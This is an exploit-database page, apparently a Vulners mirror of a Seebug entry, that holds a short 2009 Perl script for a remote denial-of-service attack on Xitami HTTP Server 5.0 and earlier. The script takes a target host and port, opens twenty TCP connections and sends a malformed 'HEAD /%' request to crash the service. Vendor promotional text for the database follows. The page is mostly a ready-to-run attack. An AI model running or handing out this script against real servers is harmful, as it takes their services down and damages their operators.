Lucene search
K

Xitami Web Server <= 5.0 Remote Denial of Service Exploit

🗓️ 23 Apr 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 24 Views

Xitami Web Server <= 5.0 Remote Denial of Service Exploit. The vulnerability crashes the HTTP service by exploiting errors with the HEAD request and multi-socket

Code

                                                #!/usr/bin/perl
#
# Xitami HTTP Server &lt;= v5.0 Remote Denial of Service.
#
# ------------------------------------------------------------------------------
# The vulnerability is caused due to an error with HEAD request and multi-socket
# This can be exploited to crash the HTTP service.
# ------------------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org


use IO::Socket;
print &quot;[+] Author : Jonathan Salwan\n&quot;;
print &quot;[+] Soft   : Xitami HTTP Server v5.0\n&quot;;

	if (@ARGV &lt; 1)
		{
 		print &quot;[-] Usage: &lt;file.pl&gt; &lt;host&gt; &lt;port&gt;\n&quot;;
 		print &quot;[-] Exemple: file.pl 127.0.0.1 80\n&quot;;
 		exit;
		}


	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];

print &quot;[+] Sending request...\n&quot;;


for($i=0;$i&lt;20;$i++)
{
$socket = IO::Socket::INET-&gt;new( Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt; &quot;$ip&quot;, PeerPort =&gt; &quot;$port&quot;) || die &quot;[-] Failed\n&quot;;

	print $socket &quot;HEAD /% HTTP/1.0\r\n\r\n&quot;;
}

print &quot;[+] Done!\n&quot;;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2009 00:00Current
7.1High risk
Vulners AI Score7.1
24